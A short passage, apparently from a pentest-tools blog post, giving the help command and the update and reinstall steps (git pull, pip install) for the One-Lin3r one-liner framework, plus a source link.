one-lin3r -h

Updating the framework or the database
On Linux, while outside the directory:
cd One-Lin3r && git pull && cd ..
pip install ./One-Lin3r --upgrade
On Windows, if you don't have git installed, redownload the framework zipped!

Link: http://feedproxy.google.com/~r/PentestTools/~3/elxDfxPSrg8/one-lin3r-v11-gives-you-one-liners-that.html